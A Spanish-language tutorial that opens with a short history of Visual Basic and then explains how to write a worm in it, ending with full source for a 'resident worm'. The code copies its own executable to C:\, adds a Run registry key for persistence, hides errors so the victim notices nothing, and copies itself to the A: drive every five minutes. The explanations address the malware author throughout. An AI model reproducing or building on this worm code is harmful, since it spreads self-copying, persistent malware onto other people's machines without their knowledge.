Es un lenguaje de programación desarrollado por Alan Cooper para Microsoft dicho lenguaje es un dialecto Basic
la primera versión corresponde al año 1991 con el propósito de simplificar la programación utilizando un ambiente de desarrollo completamente gráfico que facilitara la creación de interfaces gráficas y la programación misma. Desde el año 2001 Microsoft ha desarrollado en la API WIN32 y pasa a trabajar sobre un Framework o marco común de librerías independientes de versiones operativas .NET
Framework a través de VISUAL Basic .Net el cual está compuesto por un IDE (entorno de desarrollo integrado o llamado Integrated Devolopment Enviroment) el que a sido empaquetado como un programa de aplicación (programa en donde se escribe el código fuente) con un depurador un compilador y un constructor de interfaz gráfica o GUI.
El que proporciona la información necesaria para crear una rutina de un programa residente en Visual Basic creando un proyecto en .EXE
Durante los últimos años los programadores de códigos maliciosos han utilizado a Visual Basic para su creación de códigos maliciosos
Como insertar un gusano en Visual
código
Sub Form_Load()
hola_mundo
End Sub
Sub hola_mundo()
MsgBox “¡Hola
Esta parte del código no tiene nada en común, con la salvedad que el programador utiliza Subrutinas, la cual reduce considerablemente el tamaño del código siendo conveniente para la creación del Malware, dado que agrupa líneas de código que se usaran repetidamente en el programa.
Para poder insertar el código malicioso utilizan el comando File Copy copiando el Worm:
FileCopy “Archivo origen”,”Archivo destino”
Ejemplo
File Copy “A:\Gusano.EXE” , “C:\GusanoClon.EXE
App.EXEName
Al dar un nombre estático al Word este limita su radio de accion, debido a que el programa solo se copiara si se encuentra en o si tiene A:\ además, si el nombre es modificado éste no podrá ser modificado
Para solucionar este problema se utiliza el comando “App.EXEName” con esta instrucción se obtiene el nombre de la aplicación.
La ventaja esta en Worm no dependerá de un solo nombre, el comando se encarga de averiguarlo.
Si el Worm se llama “Gusano” al ejecutar el programa, el valor de App.EXEName entregaría:
Sub Form_Load()
FileCopy App.EXEName & “.EXE” , “C:\GusanoClon.EXE”
End Sub
A diferencia del primer programa, Hola mundo, es necesario crear el ejecutable previamente o dará un mensaje de error
En el menú de archivo se elige Generar Proyecto1.exe luego se indica la ruta y se nombra el archivo.exe desde esta ubicación es posible ejecutarlo el cual mostrará en la planilla un formulario en blanco y en la ubicación indicada en el código el archivo Gusano Clon.
Si se crea una copia Worm en el directorio en que se ejecuta en lugar de escribir el nombre de la unidad, se escribe un punto y la diagonal “.\” Visual Basic entenderá que se pretende copiar en el directorio actual
On Error Resume Next
En caso que el creador del malware tenga un error durante la ejecución del virus no es conveniente que el usuario víctima vea mensajes en la planilla, esto evidentemete
advertiría sobre la ejecución del programa.
La técnica que utiliza la siguiente instrucción que le indica a Visual Basic que en caso de presentar un error debe a la siguiente intrusión
CÓDIGO EN VB DE UN WORM RESIDENTE
Private Sub Form_Load()
A = App.EXEName
E = ".exe"
C = "C:\Gusanoh.exe"
On Error Resume Next
FileCopy A & E, C
Set Gusano = CreateObject("WScript.Shell")
Gusano.regwrite
"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\
Gusanoh", C
Open "C:\Gusanoh.txt" For Output As #1
Print #1, "LINEA DE PRUEBA NUMERO 1"
Print #1, "LINEA DE PRUEBA NUMERO 2"
Print #1, "LINEA DE PRUEBA NUMERO 3"
Print #1, "LINEA DE PRUEBA NUMERO 4"
Print #1, "LINEA DE PRUEBA NUMERO 5"
Print #1, "LINEA DE PRUEBA NUMERO 6"
Close #1
Do
M = Minute(Now)
S = Second(Now)
Y = "A:\Gusanoh.exe"
If M = 0 And S = 0 Then FileCopy A & E, Y
If M = 5 And S = 0 Then FileCopy A & E, Y
If M = 10 And S = 0 Then FileCopy A & E, Y
If M = 15 And S = 0 Then FileCopy A & E, Y
If M = 20 And S = 0 Then FileCopy A & E, Y
If M = 25 And S = 0 Then FileCopy A & E, Y
If M = 30 And S = 0 Then FileCopy A & E, Y
If M = 35 And S = 0 Then FileCopy A & E, Y
If M = 40 And S = 0 Then FileCopy A & E, Y
If M = 45 And S = 0 Then FileCopy A & E, Y
If M = 50 And S = 0 Then FileCopy A & E, Y
If M = 55 And S = 0 Then FileCopy A & E, Y
Loop
End Sub